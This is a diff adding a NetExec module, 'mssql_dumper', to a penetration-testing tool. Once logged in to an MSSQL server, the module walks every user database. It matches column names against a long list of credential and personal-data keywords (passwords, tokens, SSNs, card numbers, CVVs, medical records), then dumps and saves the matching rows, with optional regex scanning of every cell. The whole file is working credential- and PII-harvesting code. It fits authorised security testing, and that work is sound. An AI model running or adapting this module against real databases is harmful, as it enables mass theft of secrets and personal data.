|
| 1 | +import json |
| 2 | +import datetime |
| 3 | +import os |
| 4 | +from pathlib import Path |
| 5 | +import re |
| 6 | +from nxc.helpers.misc import CATEGORY |
| 7 | +from nxc.paths import NXC_PATH |
| 8 | + |
| 9 | + |
| 10 | +class NXCModule: |
| 11 | + """MSSQL Dumper v1 - Created by LTJAX""" |
| 12 | + name = "mssql_dumper" |
| 13 | + description = "Search for Sensitive Data across all databases" |
| 14 | + supported_protocols = ["mssql"] |
| 15 | + category = CATEGORY.CREDENTIAL_DUMPING |
| 16 | + |
| 17 | + def options(self, context, module_options): |
| 18 | + """ |
| 19 | + SHOW_DATA Display the actual row data values of the matched columns (default: True) |
| 20 | + REGEX Semicolon-separated regex(es) to search for in **Cell Values** |
| 21 | + LIKE_SEARCH Comma-separated list or filename of column names to specifically look for |
| 22 | + USE_PRESET Use a predefined set of regex patterns for common PII (default: True) |
| 23 | + SAVE Save the output to sqlite database (default: True) |
| 24 | + """ |
| 25 | + self.regex_patterns = [] |
| 26 | + self.show_data = module_options.get("SHOW_DATA", "true").lower() in ["true", "1", "yes"] |
| 27 | + regex_input = module_options.get("REGEX", "") |
| 28 | + for pattern in regex_input.split(";"): |
| 29 | + pattern = pattern.strip() |
| 30 | + if pattern: |
| 31 | + try: |
| 32 | + self.regex_patterns.append(re.compile(pattern)) |
| 33 | + except re.error as e: |
| 34 | + context.log.fail(f"[!] Invalid regex pattern '{pattern}': {e}") |
| 35 | + like_input = module_options.get("LIKE_SEARCH", "") |
| 36 | + if os.path.isfile(like_input): |
| 37 | + with open(like_input) as f: |
| 38 | + self.like_search = [line.strip().lower() for line in f if line.strip()] |
| 39 | + else: |
| 40 | + self.like_search = [s.strip().lower() for s in like_input.split(",") if s.strip()] |
| 41 | + self.use_preset = module_options.get("USE_PRESET", "true").lower() in ["true", "1", "yes"] |
| 42 | + self.save = module_options.get("SAVE", "true").lower() in ["true", "1", "yes"] |
| 43 | + |
| 44 | + def pii(self): |
| 45 | + """Common personally identifiable information (PII) keywords to search for in column names""" |
| 46 | + return ["access_token", "account_number", "address", "allergies", "alt_email", "annual_salary", "apartment", |
| 47 | + "api_key", "auth_code", "auth_token", "bank_account", "bank_code", "bank_id", "bank_name", "bic", |
| 48 | + "billing_address", "birth_date", "blood_type", "card_exp", "card_number", "cardholder_name", "cc_exp_month", |
| 49 | + "cc_exp_year", "cc_number", "ccv", "city", "compensation", "contract_number", "country", "credit_card_expiry", |
| 50 | + "credit_card_hash", "credit_card_number", "credit_card", "creditcard", "cvv", "cvv2", "date_of_birth", |
| 51 | + "debit_card", "diagnosis", "dl_number", "dob", "drivers_license", "ein", "email_address", "email", |
| 52 | + "emergency_contact", "employee_id", "employment_status", "expiration_date", "expiry_date", "fax", "first_name", |
| 53 | + "full_name", "gender", "health_id", "house_number", "iban", "income", "insurance_id", "insurance_number", |
| 54 | + "invoice_id", "invoice_total", "job_title", "last_name", "legal_entity", "legal_name", "location", "login_token", |
| 55 | + "maiden_name", "medical_record", "medication", "mfa_secret", "middle_name", "mobile", "national_id", "nickname", |
| 56 | + "nin", "old_password", "order_amount", "order_id", "order_total", "otp_secret", "passport_number", "passwd_hash", |
| 57 | + "passwd", "password_hash", "password_plaintext", "password_salt", "password", "patient_id", "payment_status", |
| 58 | + "payment_token", "paypal_email", "phone_number", "phone", "phonenumber", "pin_code", "pin", "position", |
| 59 | + "prescriptions", "recovery_key", "refresh_token", "region", "reset_token", "routing_number", "salary", "secret_key", |
| 60 | + "security_answer", "security_code", "security_pin", "security_question", "session_token", "session", "sessionid", |
| 61 | + "social_security_number", "ssn_hash", "ssn", "state", "street", "tax_id", "temp_password", "tin", "token", |
| 62 | + "treatment", "user_credential", "user_name", "user_pass", "user_password", "user_secret", "user_token", "username", |
| 63 | + "zip", "zipcode"] |
| 64 | + |
| 65 | + def on_login(self, context, connection): |
| 66 | + all_results = [] |
| 67 | + databases = connection.conn.sql_query("SELECT name FROM master.dbo.sysdatabases") |
| 68 | + if connection.conn.lastError: |
| 69 | + context.log.fail(f"Failed to retrieve databases: {connection.conn.lastError}") |
| 70 | + return |
| 71 | + |
| 72 | + for db in databases: |
| 73 | + db_name = db.get("name") or db.get("", "") |
| 74 | + if db_name.lower() in ("master", "model", "msdb", "tempdb"): |
| 75 | + continue # skip system DBs |
| 76 | + |
| 77 | + context.log.display(f"Searching database: {db_name}") |
| 78 | + connection.conn.sql_query(f"USE [{db_name}]") |
| 79 | + |
| 80 | + # get all tables in this DB |
| 81 | + tables = connection.conn.sql_query("SELECT table_name FROM information_schema.tables WHERE table_type = 'BASE TABLE'") |
| 82 | + |
| 83 | + for table in tables: |
| 84 | + table_name = table.get("table_name", "") |
| 85 | + try: |
| 86 | + columns = connection.conn.sql_query(f"SELECT column_name FROM information_schema.columns WHERE table_name = '{table_name}'") |
| 87 | + |
| 88 | + # find matching columns |
| 89 | + search_keys = [] |
| 90 | + if self.use_preset: |
| 91 | + search_keys += self.pii() |
| 92 | + if self.like_search: |
| 93 | + search_keys += self.like_search |
| 94 | + matched = [col for col in columns if any(key in col["column_name"].lower() for key in search_keys)] |
| 95 | + if matched: |
| 96 | + column_str = ", ".join(f"[{c['column_name']}]" for c in matched) |
| 97 | + context.log.success(f"Match in {db_name}.{table_name} => Columns: {column_str}") |
| 98 | + data = connection.conn.sql_query(f"SELECT {column_str} FROM [{table_name}]") |
| 99 | + for row in data: |
| 100 | + decoded_data = {k: (v.decode("utf-8", "replace").strip() if isinstance(v, bytes) else str(v).strip()) for k, v in row.items()} |
| 101 | + if self.show_data: |
| 102 | + context.log.highlight(f"{db_name}.{table_name} => " + ", ".join(f"{k}: {v}" for k, v in decoded_data.items())) |
| 103 | + all_results.append({ |
| 104 | + "type": "column_match", |
| 105 | + "database": db_name, |
| 106 | + "table": table_name, |
| 107 | + "row": {k: v.strip() for k, v in decoded_data.items()} |
| 108 | + }) |
| 109 | + |
| 110 | + except Exception as e: |
| 111 | + context.log.fail(f"Failed to inspect table {table_name} in {db_name}: {e}") |
| 112 | + |
| 113 | + # If regex patterns are provided, scan all cell values in the table for matches |
| 114 | + if self.regex_patterns: |
| 115 | + try: |
| 116 | + full_data = connection.conn.sql_query(f"SELECT * FROM [{table_name}]") |
| 117 | + for row in full_data: |
| 118 | + matched_cells = {} |
| 119 | + for col, val in row.items(): |
| 120 | + val_str = val.decode("utf-8", "replace").strip() if isinstance(val, bytes) else str(val).strip() |
| 121 | + |
| 122 | + # Check if any of the cells in the row match any of the regex patterns |
| 123 | + for pattern in self.regex_patterns: |
| 124 | + if pattern.search(val_str): |
| 125 | + matched_cells[col] = val_str |
| 126 | + break |
| 127 | + |
| 128 | + if matched_cells: |
| 129 | + match_str = ", ".join(f"{k}: {v}" for k, v in matched_cells.items()) |
| 130 | + if self.show_data: |
| 131 | + context.log.highlight(f"{db_name}.{table_name} => Regex Match => {match_str}") |
| 132 | + all_results.append({ |
| 133 | + "type": "regex_match", |
| 134 | + "database": db_name, |
| 135 | + "table": table_name, |
| 136 | + "matched_cells": matched_cells |
| 137 | + }) |
| 138 | + except Exception as e: |
| 139 | + context.log.fail(f"Regex scan failed for {db_name}.{table_name}: {e}") |
| 140 | + |
| 141 | + if self.save and all_results: |
| 142 | + filename = f"{connection.hostname}_{connection.host}_{datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}.json" |
| 143 | + file_path = Path(f"{NXC_PATH}/modules/mssql-dumper/{filename}").resolve() |
| 144 | + os.makedirs(file_path.parent, exist_ok=True) |
| 145 | + with open(file_path, "w") as f: |
| 146 | + json.dump(all_results, f, indent=2) |
| 147 | + context.log.success(f"Data saved to {file_path}") |
0 commit comments